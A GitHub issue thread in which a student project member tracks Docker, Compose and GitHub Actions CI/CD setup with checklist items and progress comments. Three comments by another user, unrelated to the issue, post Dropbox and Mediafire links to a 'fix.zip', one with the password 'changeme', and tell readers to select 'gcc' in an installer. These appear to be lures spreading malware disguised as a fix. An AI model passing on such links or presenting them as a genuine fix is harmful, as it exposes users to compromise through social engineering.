### ISSUE TITLE
Set up Docker container

### ISSUE THREAD

**Issue by SamanthaCra** [OtagoPolytechnic/Cloudy-with-a-Chance-of-LoRa#42]
This is for automation of our live app. Build will need to be documented. 

- [x] Write a Dockerfile: Create a Dockerfile in the project that defines the environment and dependencies the application needs.

- [x] Create a Docker Compose File

- [ ] #69

Set Up Continuous Integration (CI) with GitHub Actions:

- [x] Create a Workflow File: This file will define the steps to build and deploy the Docker container.

- [x]  Define Triggers: Configure the workflow to trigger on push events to the main branch.

- [x] Include Build and Deployment Steps: Add steps to the workflow to build Docker image, push it to a Docker registry and deploy it to the server.

- [x] Configure Secrets:

- [x] Set Up Deployment Environment: Configure the VM to pull the Docker image from the registry and run it.

- [ ] #70

- [x] Verify and test: Make a change to the code and push it to the main branch. 
- [ ] Verify that the workflow is triggered, the Docker image is built and deployed, and the application runs as expected in thedeployment environment.

**Comment by SamanthaCra** [comment]
Documented in: https://github.com/OtagoPolytechnic/Cloudy-with-a-Chance-of-LoRa/wiki/Docker

**Comment by SamanthaCra** [comment]
Added workflow file, merged #43.

**Comment by SamanthaCra** [comment]
Added docker creds as secrets 
![image](https://github.com/user-attachments/assets/11cc91ea-bcbc-47b4-aab7-279cb2b223b8)

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by SamanthaCra** [comment]
Manual runs of docker back and frontends are working.
